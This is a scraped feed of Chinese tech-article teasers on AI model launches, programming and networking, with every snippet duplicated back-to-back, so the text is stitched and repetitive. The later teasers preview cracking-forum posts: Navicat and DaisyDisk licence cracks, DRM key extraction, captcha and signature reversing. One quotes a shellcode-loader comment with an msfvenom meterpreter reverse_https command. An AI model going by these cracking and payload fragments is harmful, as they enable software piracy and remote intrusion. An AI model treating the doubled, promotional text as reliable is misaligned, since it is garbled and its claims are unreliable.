虽然目前没有证据显示这些数据被出售给第三方,但洗衣机这种使用寿命长达十余年的设备,意味着数据可能被长期持续采集。这一点正在引发公众对“长周期数据追踪”的担忧。虽然目前没有证据显示这些数据被出售给第三方,但洗衣机这种使用寿命长达十余年的设备,意味着数据可能被长期持续采集。这一点正在引发公众对“长周期数据追踪”的担忧。
Anthropic宣布任命前Stripe CTO Rahul Patil为新任首席技术官,此次换帅旨在强化Anthropic的AI基础设施,以应对Claude产品快速增长带来的算力和能耗压力。同时,也是为了面对OpenAI和Meta数千亿美元级的基础设施投入而进行的一次战略调整。Anthropic宣布任命前Stripe CTO Rahul Patil为新任首席技术官,此次换帅旨在强化Anthropic的AI基础设施,以应对Claude产品快速增长带来的算力和能耗压力。同时,也是为了面对OpenAI和Meta数千亿美元级的基础设施投入而进行的一次战略调整。
本文探讨论文《语言模型为何会产生幻觉?》中的五个发现。本文就语言模型幻觉的成因和持续性提供了几个富有洞察力的总体启示,我们将逐一探讨其中的五点。本文探讨论文《语言模型为何会产生幻觉?》中的五个发现。本文就语言模型幻觉的成因和持续性提供了几个富有洞察力的总体启示,我们将逐一探讨其中的五点。
Sora 2火爆全球!上线不到24小时便冲上苹果商店榜单前三,凭借「1换4」邀请码机制和「Cameo自我上传」玩法,引爆社交传播。奥特曼亲自下场,让邀请码成为稀缺资源,被黄牛炒至175美元。Sora既带来全民狂欢,也引发OpenAI内部争议。Sora 2火爆全球!上线不到24小时便冲上苹果商店榜单前三,凭借「1换4」邀请码机制和「Cameo自我上传」玩法,引爆社交传播。奥特曼亲自下场,让邀请码成为稀缺资源,被黄牛炒至175美元。Sora既带来全民狂欢,也引发OpenAI内部争议。
EgoTwin 是一个基于扩散模型的框架,能够以视角一致且因果连贯的方式联合生成第一人称视角视频和人体动作。生成的视频可以通过从人体动作推导出的相机位姿,借助 3D 高斯点渲染(3D Gaussian Splatting)提升到三维场景中。EgoTwin 是一个基于扩散模型的框架,能够以视角一致且因果连贯的方式联合生成第一人称视角视频和人体动作。生成的视频可以通过从人体动作推导出的相机位姿,借助 3D 高斯点渲染(3D Gaussian Splatting)提升到三维场景中。
一方面,我们希望机器人能够学习到多样化、高动态、接触丰富的人类动作知识,具备通用性。另一方面,我们也希望机器人具备在线动态的适应性,能够克服sim2real的差距,以及在不同场景下灵活调用这些“技能包”,具备抗干扰的能力。一方面,我们希望机器人能够学习到多样化、高动态、接触丰富的人类动作知识,具备通用性。另一方面,我们也希望机器人具备在线动态的适应性,能够克服sim2real的差距,以及在不同场景下灵活调用这些“技能包”,具备抗干扰的能力。
今年三月底,React 发布了 v19.1。半年后,10 月 1 日,React 团队又带来了 React 19.2。虽然这是一次小迭代,但里面的几个新特性都很实用,尤其对 复杂交互、性能优化、以及服务端渲染(SSR) 场景有不少帮助。今年三月底,React 发布了 v19.1。半年后,10 月 1 日,React 团队又带来了 React 19.2。虽然这是一次小迭代,但里面的几个新特性都很实用,尤其对 复杂交互、性能优化、以及服务端渲染(SSR) 场景有不少帮助。
这次 macOS 26 卡顿,就是因为系统底层的渲染机制变了,Electron 老做法顶不住。如果你在维护 Electron 应用,现在就去翻一下 package.json,看看是不是该升级 Electron 了。别等用户来吐槽“怎么一用就卡死”,再去补锅。这次 macOS 26 卡顿,就是因为系统底层的渲染机制变了,Electron 老做法顶不住。如果你在维护 Electron 应用,现在就去翻一下 package.json,看看是不是该升级 Electron 了。别等用户来吐槽“怎么一用就卡死”,再去补锅。
在软件开发、推理能力上更锋利,对重数学任务也罕见地稳。别家模型走几步就绊倒的多阶段任务,Sonnet 4.5 能把 30+ 小时的多步骤流程稳稳跑完——这在业内几乎闻所未闻。在软件开发、推理能力上更锋利,对重数学任务也罕见地稳。别家模型走几步就绊倒的多阶段任务,Sonnet 4.5 能把 30+ 小时的多步骤流程稳稳跑完——这在业内几乎闻所未闻。
在订单处理系统中,如果一个类同时承担订单计算、库存扣减和日志记录这三项职责,当库存逻辑需要支持分布式锁时,开发人员在修改库存扣减逻辑的过程中,就很可能不小心影响到订单总价计算的逻辑,牵一发而动全身,导致程序出现难以排查的问题。这就是因为这个类违反了单一职责原则,承担了过多的变化原因。在订单处理系统中,如果一个类同时承担订单计算、库存扣减和日志记录这三项职责,当库存逻辑需要支持分布式锁时,开发人员在修改库存扣减逻辑的过程中,就很可能不小心影响到订单总价计算的逻辑,牵一发而动全身,导致程序出现难以排查的问题。这就是因为这个类违反了单一职责原则,承担了过多的变化原因。
Python社区为我们提供了一个强大而简洁的工具——py3dbp。本文将带您深入了解这个库,并通过一个实际案例,展示如何从零开始解决一个装箱问题,并最终创建一个直观的动态装箱过程GIF。Python社区为我们提供了一个强大而简洁的工具——py3dbp。本文将带您深入了解这个库,并通过一个实际案例,展示如何从零开始解决一个装箱问题,并最终创建一个直观的动态装箱过程GIF。
SQL没有死,它只是在AI的加持下,进化成了更强大的物种。它正在从一门单纯的"数据查询语言",变成一门"智能调度语言"。SQL没有死,它只是在AI的加持下,进化成了更强大的物种。它正在从一门单纯的"数据查询语言",变成一门"智能调度语言"。
要聊 ServiceMesh,就不得不提 Istio,它是 ServiceMesh 的最流行实践,今天聊聊 Istio。要聊 ServiceMesh,就不得不提 Istio,它是 ServiceMesh 的最流行实践,今天聊聊 Istio。
Claude Sonnet 4.5发布,定义AI编码新标准。SWE-bench领先、30小时长任务处理与Agent SDK开放。同等价格($3/$15每百万token)实现质的飞跃,错误率从9%降至0%,是开发者不可错过的重大升级。Claude Sonnet 4.5发布,定义AI编码新标准。SWE-bench领先、30小时长任务处理与Agent SDK开放。同等价格($3/$15每百万token)实现质的飞跃,错误率从9%降至0%,是开发者不可错过的重大升级。
硬件作为AI业务落地的基础设施,不仅决定模型训练的效率,更直接影响推理服务的实时性与用户体验。本文将从设备管理员视角,结合推理过程核心阶段的分析,剖析推理过程对硬件参数的要求,为AI硬件选型与性能优化提供参考。硬件作为AI业务落地的基础设施,不仅决定模型训练的效率,更直接影响推理服务的实时性与用户体验。本文将从设备管理员视角,结合推理过程核心阶段的分析,剖析推理过程对硬件参数的要求,为AI硬件选型与性能优化提供参考。
基数树真的是一个被低估的数据结构。在合适的场景下,它能带来数倍甚至数十倍的性能提升。基数树真的是一个被低估的数据结构。在合适的场景下,它能带来数倍甚至数十倍的性能提升。
基于Spring AI实现的MCP协议,与Spring Boot进行了集成,提供客户端和服务器端两种启动器Starter,可快速搭建具备 MCP 支持能力的 AI 应用。基于Spring AI实现的MCP协议,与Spring Boot进行了集成,提供客户端和服务器端两种启动器Starter,可快速搭建具备 MCP 支持能力的 AI 应用。
Frp 是一款开源免费但功能相当强大的内网穿透工具,适用于各种场景:从远程访问办公内网系统,到暴露本地开发环境。Frp 是一款开源免费但功能相当强大的内网穿透工具,适用于各种场景:从远程访问办公内网系统,到暴露本地开发环境。
无论是企业内部的局域网,还是广域网,遇到网络中断、慢速或丢包等问题时,如何高效地排查和解决问题是每个网络管理员需要掌握的技能。无论是企业内部的局域网,还是广域网,遇到网络中断、慢速或丢包等问题时,如何高效地排查和解决问题是每个网络管理员需要掌握的技能。
在这个新架构中,LLM 将扮演一个核心计算引擎的角色,其强大的泛化能力和“涌现”能力,使得它能够完成过去需要大量硬编码规则和逻辑才能实现的任务。在这个新架构中,LLM 将扮演一个核心计算引擎的角色,其强大的泛化能力和“涌现”能力,使得它能够完成过去需要大量硬编码规则和逻辑才能实现的任务。
Mini-o3作为一款开源的视觉推理模型,通过其深度多轮推理能力和创新的技术手段,在多个视觉搜索基准测试中取得了卓越的性能。它的开源性为研究人员提供了极大的便利,有助于推动相关技术的进一步发展。Mini-o3作为一款开源的视觉推理模型,通过其深度多轮推理能力和创新的技术手段,在多个视觉搜索基准测试中取得了卓越的性能。它的开源性为研究人员提供了极大的便利,有助于推动相关技术的进一步发展。
DeepSeek显然就属于追求极致性能的专家用户了,根据v3.2公告的说法,在早期DeepSeek团队使用TileLang快速开发原型,之后用更底层的方法进一步优化性能。DeepSeek显然就属于追求极致性能的专家用户了,根据v3.2公告的说法,在早期DeepSeek团队使用TileLang快速开发原型,之后用更底层的方法进一步优化性能。
昨天,DeepSeek 开源新模型 V3.2-Exp,深夜 Anthropic 也不甘人后,重磅发布 Claude Sonnet 4.5。昨天,DeepSeek 开源新模型 V3.2-Exp,深夜 Anthropic 也不甘人后,重磅发布 Claude Sonnet 4.5。
在最新播客《Unsupervised Learning》中,Tri Dao分享了对GPU市场、推理成本、模型架构以及AI未来趋势的深度洞察,并针对上述“暴论”展开了有理有据的分。在最新播客《Unsupervised Learning》中,Tri Dao分享了对GPU市场、推理成本、模型架构以及AI未来趋势的深度洞察,并针对上述“暴论”展开了有理有据的分。
VolSplat大胆抛弃像素对齐的固有范式,提出“体素对齐”(voxel-aligned)的前馈框架:在三维空间中融合视图信息,从根本上破局,让高质量的多视角渲染变得更鲁棒、更高效、更易工程化。VolSplat大胆抛弃像素对齐的固有范式,提出“体素对齐”(voxel-aligned)的前馈框架:在三维空间中融合视图信息,从根本上破局,让高质量的多视角渲染变得更鲁棒、更高效、更易工程化。
上海人工智能实验室发布新一代文档解析大模型——MinerU2.5。上海人工智能实验室发布新一代文档解析大模型——MinerU2.5。
为具身智能行业提供了一个可复用、可扩展的通用基座,同时开源训练数据集。为具身智能行业提供了一个可复用、可扩展的通用基座,同时开源训练数据集。
gdb告诉我们数组global_array存放在内存0x601050这个地址上。注意0x601050这个地址和刚才看到的0x7ffffffee280这个地址相去甚远,为什么呢?全局区几乎在最底部,栈区在最顶部,所以相差很远。gdb告诉我们数组global_array存放在内存0x601050这个地址上。注意0x601050这个地址和刚才看到的0x7ffffffee280这个地址相去甚远,为什么呢?全局区几乎在最底部,栈区在最顶部,所以相差很远。
新阵容在视频理解能力与评测体系全线突破,全面巩固 SALMONN 家族在开源音视频理解大模型赛道的领先地位。新阵容在视频理解能力与评测体系全线突破,全面巩固 SALMONN 家族在开源音视频理解大模型赛道的领先地位。
Oracle的23AI是从23C改名而来的,这说明Oracle刚开始的时候对于AI的爆发点也是准备不足的,在融合数据库刚刚起步的时候匆匆忙忙转向了AI方向。幸运的是,融合和AI的大方向是一致的,所以并没有走什么弯路。Oracle的23AI是从23C改名而来的,这说明Oracle刚开始的时候对于AI的爆发点也是准备不足的,在融合数据库刚刚起步的时候匆匆忙忙转向了AI方向。幸运的是,融合和AI的大方向是一致的,所以并没有走什么弯路。
混合专家持续学习框架 MoE-CL 通过三大核心设计破局:专属任务专家防止灾难性遗忘,任务共享专家促进跨任务知识迁移,生成对抗网络保障共享信息质量。混合专家持续学习框架 MoE-CL 通过三大核心设计破局:专属任务专家防止灾难性遗忘,任务共享专家促进跨任务知识迁移,生成对抗网络保障共享信息质量。
零拷贝技术通过减少或消除数据在内存中的拷贝次数,以及减少用户态与内核态之间的上下文切换,显著提升了IO操作的性能。本文将详细介绍零拷贝技术的工作原理及其在实际项目中的应用。零拷贝技术通过减少或消除数据在内存中的拷贝次数,以及减少用户态与内核态之间的上下文切换,显著提升了IO操作的性能。本文将详细介绍零拷贝技术的工作原理及其在实际项目中的应用。
神经网络层数越多效果越好这一观点,在特定条件下成立,其核心逻辑在于深层网络通过分层抽象能够学习到更复杂的特征表示,从而提升模型对复杂数据的建模能力。神经网络层数越多效果越好这一观点,在特定条件下成立,其核心逻辑在于深层网络通过分层抽象能够学习到更复杂的特征表示,从而提升模型对复杂数据的建模能力。
DeepSeek-V3.2-Exp刚刚官宣上线,不仅引入了新的注意力机制——DeepSeek Sparse Attention。DeepSeek-V3.2-Exp刚刚官宣上线,不仅引入了新的注意力机制——DeepSeek Sparse Attention。
人工智能的狂乱无处不在,有人已经开始担心人工智能支配我们生活的方方面面。每天都有新的人工智能应用程序出现,将可能性的边界推得更远。人工智能的狂乱无处不在,有人已经开始担心人工智能支配我们生活的方方面面。每天都有新的人工智能应用程序出现,将可能性的边界推得更远。
TileLang作为一款新兴的AI算子编程语言,凭借其创新的Tile级抽象、多层级编程范式和强大的自动调度能力,为AI算子开发提供了兼具高生产力和高性能的解决方案。TileLang作为一款新兴的AI算子编程语言,凭借其创新的Tile级抽象、多层级编程范式和强大的自动调度能力,为AI算子开发提供了兼具高生产力和高性能的解决方案。
对于开发团队来说,升级意味着需要提前测试依赖兼容性和 API 替换。但带来的收益是显而易见的:更高的开发效率、更强的可维护性、更稳的生产部署。对于开发团队来说,升级意味着需要提前测试依赖兼容性和 API 替换。但带来的收益是显而易见的:更高的开发效率、更强的可维护性、更稳的生产部署。
在数字化生存的今天,数据已成为企业的核心资产与生命线。然而,从核心业务数据、客户隐私信息到知识产权,这些存储在数据库中的宝贵财富,正面临着来自外部攻击、内部威胁以及合规失误的多重挑战。数据泄露不仅会引发巨额的经济损失和严厉的法律制裁,更会对企业声誉造成毁灭性打击。在数字化生存的今天,数据已成为企业的核心资产与生命线。然而,从核心业务数据、客户隐私信息到知识产权,这些存储在数据库中的宝贵财富,正面临着来自外部攻击、内部威胁以及合规失误的多重挑战。数据泄露不仅会引发巨额的经济损失和严厉的法律制裁,更会对企业声誉造成毁灭性打击。
今天凌晨,Claude Sonnet 4.5发布了!新模型在编码、计算机使用、推理、长任务能力、安全对齐上的水平全面拔高,成为新一代编程模型王者。新一轮围绕编程展开的百模大战即将展开,而Claude Sonnet 4.5即将成为大家争相对标的新对象。今天凌晨,Claude Sonnet 4.5发布了!新模型在编码、计算机使用、推理、长任务能力、安全对齐上的水平全面拔高,成为新一代编程模型王者。新一轮围绕编程展开的百模大战即将展开,而Claude Sonnet 4.5即将成为大家争相对标的新对象。
当前,国内互联网已步入“业务3.0”阶段——由增量蓝海转为存量红海,增长逻辑从高速扩张转向精耕细作。企业唯有依赖既有数据资产,挖掘潜在机会,方能在存量竞争中保持优势。当前,国内互联网已步入“业务3.0”阶段——由增量蓝海转为存量红海,增长逻辑从高速扩张转向精耕细作。企业唯有依赖既有数据资产,挖掘潜在机会,方能在存量竞争中保持优势。
当用户的搜索意图逐渐被识别出来以后,代理便能够据此调起合适的插件或工作流。实际上,不论是大模型所具备的插件功能,还是 Agent 平台上的插件能力与工作流,本质上都没有区别。它们的共同点,都是为了让大模型能够获得额外的程序执行能力,从而完成更加复杂的任务。当用户的搜索意图逐渐被识别出来以后,代理便能够据此调起合适的插件或工作流。实际上,不论是大模型所具备的插件功能,还是 Agent 平台上的插件能力与工作流,本质上都没有区别。它们的共同点,都是为了让大模型能够获得额外的程序执行能力,从而完成更加复杂的任务。
LLM 应用的快速发展正在改变着我们的工作和生活方式,但与此同时,如何保障这些应用的稳定性和质量成为了一个重要挑战。正如我们在 SQL Copilot 项目中的实践所示,完备且能力强大的底层数据基础设施和可观测能力是 LLM 应用成功的重要保障。LLM 应用的快速发展正在改变着我们的工作和生活方式,但与此同时,如何保障这些应用的稳定性和质量成为了一个重要挑战。正如我们在 SQL Copilot 项目中的实践所示,完备且能力强大的底层数据基础设施和可观测能力是 LLM 应用成功的重要保障。
在docker容器化平台安装过程中,我们遇到一个典型问题:容器启动过程中,访问镜像仓库服务失败,重试40次依然无果,来看看怎么回事。在docker容器化平台安装过程中,我们遇到一个典型问题:容器启动过程中,访问镜像仓库服务失败,重试40次依然无果,来看看怎么回事。
某酒店网络使用联通800M专线,晚上客户入住后出现流量拉满,客人反馈网络卡顿无法使用,路由器看到CPU一直90%的异常问题。某酒店网络使用联通800M专线,晚上客户入住后出现流量拉满,客人反馈网络卡顿无法使用,路由器看到CPU一直90%的异常问题。
药物发现过程漫长、资源密集,且成功率不足90%,导致大多数疾病,尤其是罕见或被忽视的适应症,缺乏有效疗法。药物再利用提供了一个成本效益高的替代方案,然而,由于生物医学知识的规模和异质性,系统性地识别新的药物适应症对及其作用机制仍然受到阻碍。药物发现过程漫长、资源密集,且成功率不足90%,导致大多数疾病,尤其是罕见或被忽视的适应症,缺乏有效疗法。药物再利用提供了一个成本效益高的替代方案,然而,由于生物医学知识的规模和异质性,系统性地识别新的药物适应症对及其作用机制仍然受到阻碍。
Spring Boot 4.x 将随 Spring Framework 7.x 一起11月份发布,其中最重要的变更之一就是从 Jackson 2.x 升级到 Jackson 3.x。这次升级带来了许多破坏性变更,需要开发者特别注意。Spring Boot 4.x 将随 Spring Framework 7.x 一起11月份发布,其中最重要的变更之一就是从 Jackson 2.x 升级到 Jackson 3.x。这次升级带来了许多破坏性变更,需要开发者特别注意。
数据库终究是持久化存储,其IO性能有上限。要应对10万QPS,我们必须将主战场转移到更快的内存中。这就是引入缓存(如Redis)的原因。数据库终究是持久化存储,其IO性能有上限。要应对10万QPS,我们必须将主战场转移到更快的内存中。这就是引入缓存(如Redis)的原因。
本文尼恩从 底层原理(方法论的核心逻辑)、实操步骤(实际应用中的关键动作)、 案例实操三方面拆解TOGAF、Zachman、OEA、ITSA、DODAF,最后通过对比明确各自定位与适用场景, 帮助大家 一下逆袭成为架构专家,成为顶尖高手。本文尼恩从 底层原理(方法论的核心逻辑)、实操步骤(实际应用中的关键动作)、 案例实操三方面拆解TOGAF、Zachman、OEA、ITSA、DODAF,最后通过对比明确各自定位与适用场景, 帮助大家 一下逆袭成为架构专家,成为顶尖高手。
十行代码带你极速接入鸿蒙6新特性应用内打分评价前言HarmonyOS6的beta版本来到了beta5,也是给我们带来了不少的有趣的新特性。应用评论服务...十行代码带你极速接入鸿蒙6新特性应用内打分评价前言HarmonyOS6的beta版本来到了beta5,也是给我们带来了不少的有趣的新特性。应用评论服务...
[toc](目录)前言大家好,我是若城!欢迎来到HarmonyOS5开发实战系列。本系列致力于为开发者提供实用的技术方案和即拿即用的代码示例,帮助...[toc](目录)前言大家好,我是若城!欢迎来到HarmonyOS5开发实战系列。本系列致力于为开发者提供实用的技术方案和即拿即用的代码示例,帮助...
[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly9odW5hbi56Y ...[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly9odW5hbi56Y ...
[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly93d3cudGhha ...[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly93d3cudGhha ...
原帖地址:自己平时用py写了个一体化打包,来检验一下好破解吗 - 吾爱破解 - 52pojie.cn1. 首先观察楼主给出的图片,根据打码的长度和下面汉字的长度(一个汉字两个字符长度),判断出密码是10位 2. 下载exe拖入die判 ...原帖地址:自己平时用py写了个一体化打包,来检验一下好破解吗 - 吾爱破解 - 52pojie.cn1. 首先观察楼主给出的图片,根据打码的长度和下面汉字的长度(一个汉字两个字符长度),判断出密码是10位 2. 下载exe拖入die判 ...
[md]前几天有评论说win11环境下之前的方法不行,试了一下确实不行。主要原因还是echo_driver.sys驱动加载失败了,返回的错误码是0x800B010C,对应的含义如下:[/md] [md]需要重新寻找新的具有任意地址读写漏洞的具有 ...[md]前几天有评论说win11环境下之前的方法不行,试了一下确实不行。主要原因还是echo_driver.sys驱动加载失败了,返回的错误码是0x800B010C,对应的含义如下:[/md] [md]需要重新寻找新的具有任意地址读写漏洞的具有 ...
[md]## 文章目录 - 免责声明 - 授权机制 - 代码签名 - 验证废除 - 指纹生成 - 凭证植入 - 网络钩子 - 惊喜彩蛋 ## 免责声明 本文所有内容仅用于学术研究、技术探讨及教育学习的目的,旨在帮助读者加深对 ...[md]## 文章目录 - 免责声明 - 授权机制 - 代码签名 - 验证废除 - 指纹生成 - 凭证植入 - 网络钩子 - 惊喜彩蛋 ## 免责声明 本文所有内容仅用于学术研究、技术探讨及教育学习的目的,旨在帮助读者加深对 ...
[md]# 某网站 clearkey 分析 网站有两种 DRM:**Widevine** 和 **biliDRM(clearkey)** --- ## 1. 获取 Key 单纯拿 key 都很简单,下个插件,随便找个 L3 就能拿到 key。 项目地址: [https://github.com/DevLARLEY/WidevineProxy2](https://github.co ...[md]# 某网站 clearkey 分析 网站有两种 DRM:**Widevine** 和 **biliDRM(clearkey)** --- ## 1. 获取 Key 单纯拿 key 都很简单,下个插件,随便找个 L3 就能拿到 key。 项目地址: [https://github.com/DevLARLEY/WidevineProxy2](https://github.co ...
先看该token哪里来的. 注意到下面的请求cookie才第一次使用到__zp_stoken__,推断出是在这个0f35c990.js里生成的.注意该文件以及文件名会在每天晚上0点-1点之间变动一次,固定为每天一次. 下面分析该js. 该js分为两部 ...先看该token哪里来的. 注意到下面的请求cookie才第一次使用到__zp_stoken__,推断出是在这个0f35c990.js里生成的.注意该文件以及文件名会在每天晚上0点-1点之间变动一次,固定为每天一次. 下面分析该js. 该js分为两部 ...
[md]# 1、背景 在刷B站时看到有人在分享这个漏洞的原因,稍微琢磨了一下,脑袋告诉我:懂了,原来如此。但up主最后只给出了x64dbg中判断字符是否是空格的地方,没有给出定位过程,所以当时就来了兴趣,想自己分析分析 ...[md]# 1、背景 在刷B站时看到有人在分享这个漏洞的原因,稍微琢磨了一下,脑袋告诉我:懂了,原来如此。但up主最后只给出了x64dbg中判断字符是否是空格的地方,没有给出定位过程,所以当时就来了兴趣,想自己分析分析 ...
[md]# 某修仙肉鸽游戏协议逆向分析折腾记录 前阵子无意中接触到ZMXS这款游戏,玩了两天后觉得挺有意思的,就想着能不能深入研究一下它的网络协议实现。这一折腾就是一个多星期,踩了不少坑,但收获也挺大的。整个分析 ...[md]# 某修仙肉鸽游戏协议逆向分析折腾记录 前阵子无意中接触到ZMXS这款游戏,玩了两天后觉得挺有意思的,就想着能不能深入研究一下它的网络协议实现。这一折腾就是一个多星期,踩了不少坑,但收获也挺大的。整个分析 ...
[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly96aXl1YW4uY ...[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly96aXl1YW4uY ...
[md]参考 [Navicat for Sqlite 17.3.2 英文版 一字节替换RSA公钥](https://www.52pojie.cn/thread-2056733-1-1.html),不难定位到公钥碎片地址,交叉引用查到公钥拼接函数 `sub_18215B240`。[/md] [md]公钥拼接函数 ...[md]参考 [Navicat for Sqlite 17.3.2 英文版 一字节替换RSA公钥](https://www.52pojie.cn/thread-2056733-1-1.html),不难定位到公钥碎片地址,交叉引用查到公钥拼接函数 `sub_18215B240`。[/md] [md]公钥拼接函数 ...
[md] 目标captcha_id: 045e2c229998a88721e32a763bc0f7b8 **文章写的不太好, 完全是靠运气逆向出来的, 还请多多包涵** 环境使用[极验给出的demo代码](https://github.com/geetestweb/gt4-public-client-demo) ...[md] 目标captcha_id: 045e2c229998a88721e32a763bc0f7b8 **文章写的不太好, 完全是靠运气逆向出来的, 还请多多包涵** 环境使用[极验给出的demo代码](https://github.com/geetestweb/gt4-public-client-demo) ...
[md]在[Navicat 17 破解教程](https://www.52pojie.cn/thread-2052969-1-1.html)中,iwolf大佬详细分析了 Navicat Premium 17.1.3 的破解过程。分析发现,程序所使用的 RSA 公钥以碎片化的方式分散在 libcc.dll 的 .rdata ...[md]在[Navicat 17 破解教程](https://www.52pojie.cn/thread-2052969-1-1.html)中,iwolf大佬详细分析了 Navicat Premium 17.1.3 的破解过程。分析发现,程序所使用的 RSA 公钥以碎片化的方式分散在 libcc.dll 的 .rdata ...
[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly93d3cuZGluZ ...[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站: aHR0cHM6Ly93d3cuZGluZ ...
[md]Navicat作为查看、管理数据库的工具,使用广泛,本教程针对版本17.1.3进行破解。此版本的下载地址请自行搜索,官网已有新版本,可能直接找不到旧版地址,网上的一些历史版本官方下载地址可能没有17的。 **8.19更新 ...[md]Navicat作为查看、管理数据库的工具,使用广泛,本教程针对版本17.1.3进行破解。此版本的下载地址请自行搜索,官网已有新版本,可能直接找不到旧版地址,网上的一些历史版本官方下载地址可能没有17的。 **8.19更新 ...
[md]## unidbg模拟执行的去除ollvm混淆 ### 1.函数简单分析 ***项目地址:https://github.com/Aar0n3906/Anti-BR-Obf*** 对libtprt.so中的JNI_Onload函数进行去混淆 可以发现在函数后方使用了BR X9作为间 ...[md]## unidbg模拟执行的去除ollvm混淆 ### 1.函数简单分析 ***项目地址:https://github.com/Aar0n3906/Anti-BR-Obf*** 对libtprt.so中的JNI_Onload函数进行去混淆 可以发现在函数后方使用了BR X9作为间 ...
[md]> ## 声明 > 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ### 研究对象 ### 目标 - 补环境代码 ...[md]> ## 声明 > 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ### 研究对象 ### 目标 - 补环境代码 ...
[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站:aHR0cHM6Ly93d3cudmFwdGN ...[md]## 声明 本文章中所有内容仅供学习交流使用,不用于其他任何目的,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!若有侵权,请联系作者删除。 ## 逆向目标 目标网站:aHR0cHM6Ly93d3cudmFwdGN ...
[md]# 前言: app :VMOS Pro 3.1.1(https://www.vmos.cn) 工具:jadx,reqable,frida,pycharm,雷电模拟器,算法助手,真机 方法:hook 难点:加壳,加密,混淆 ## app界面: ![]() # 正文: > 注:该版本有360加固 ...[md]# 前言: app :VMOS Pro 3.1.1(https://www.vmos.cn) 工具:jadx,reqable,frida,pycharm,雷电模拟器,算法助手,真机 方法:hook 难点:加壳,加密,混淆 ## app界面: ![]() # 正文: > 注:该版本有360加固 ...
[md]# 背景 ARMO 研究团队近日披露 Linux 运行时安全工具存在重大缺陷,证实`io_uring`接口可使 rootkit 绕过常规监控方案,包括 Falco、Tetragon 等等在内的主流工具均无法检测利用该机制的攻击行为。并且 ARMO 团队 ...[md]# 背景 ARMO 研究团队近日披露 Linux 运行时安全工具存在重大缺陷,证实`io_uring`接口可使 rootkit 绕过常规监控方案,包括 Falco、Tetragon 等等在内的主流工具均无法检测利用该机制的攻击行为。并且 ARMO 团队 ...
[md]# 前世 ## Win32 API Win32 API实现最简单的Shellcode Loader如下,代码中包含注释,可以看到每条语句的含义 ``` #include #include // msfvenom -p windows/meterpreter/reverse_https lhost=xxx lpo ...[md]# 前世 ## Win32 API Win32 API实现最简单的Shellcode Loader如下,代码中包含注释,可以看到每条语句的含义 ``` #include #include // msfvenom -p windows/meterpreter/reverse_https lhost=xxx lpo ...
本文章中所有内容仅供学习交流使用,不用于其他任何目的,不提供完整代码,抓包内容、敏感网址、数据接口等均已做脱敏处理,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关.本文章未经许可禁止转载, ...本文章中所有内容仅供学习交流使用,不用于其他任何目的,不提供完整代码,抓包内容、敏感网址、数据接口等均已做脱敏处理,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关.本文章未经许可禁止转载, ...
事先说明,对加壳程序选项没有包含反调试,资源保护以及虚拟化特定代码片段,vmp会对相关的资源函数进行hook,修复了也无法运行(好像易语言可以 恢复原始api就可以,我尝试了其他程序,修复之后无法运行,放弃),目前没有 ...事先说明,对加壳程序选项没有包含反调试,资源保护以及虚拟化特定代码片段,vmp会对相关的资源函数进行hook,修复了也无法运行(好像易语言可以 恢复原始api就可以,我尝试了其他程序,修复之后无法运行,放弃),目前没有 ...
[md]# DaisyDisk v4.31 破解 # 简单介绍 DaisyDisk是一款用于显示文件在磁盘中占比的软件,功能类似于Windows上的TreeSize Free,但稍微弱些,每次打开都需要选择磁盘并扫描,对于1T的盘大概需要近一分钟。软件采 ...[md]# DaisyDisk v4.31 破解 # 简单介绍 DaisyDisk是一款用于显示文件在磁盘中占比的软件,功能类似于Windows上的TreeSize Free,但稍微弱些,每次打开都需要选择磁盘并扫描,对于1T的盘大概需要近一分钟。软件采 ...
[md]# 猿人学第二十关逆向分析教程 **[原创] 猿人学学员题34题 js加课例题1 逆向分析** 还原“猿人学 第20关”中加密参数 `sign` 的生成逻辑,最终用 Python 脚本模拟访问接口。 分析地址:aHR0cHM6Ly9tYXR ...[md]# 猿人学第二十关逆向分析教程 **[原创] 猿人学学员题34题 js加课例题1 逆向分析** 还原“猿人学 第20关”中加密参数 `sign` 的生成逻辑,最终用 Python 脚本模拟访问接口。 分析地址:aHR0cHM6Ly9tYXR ...
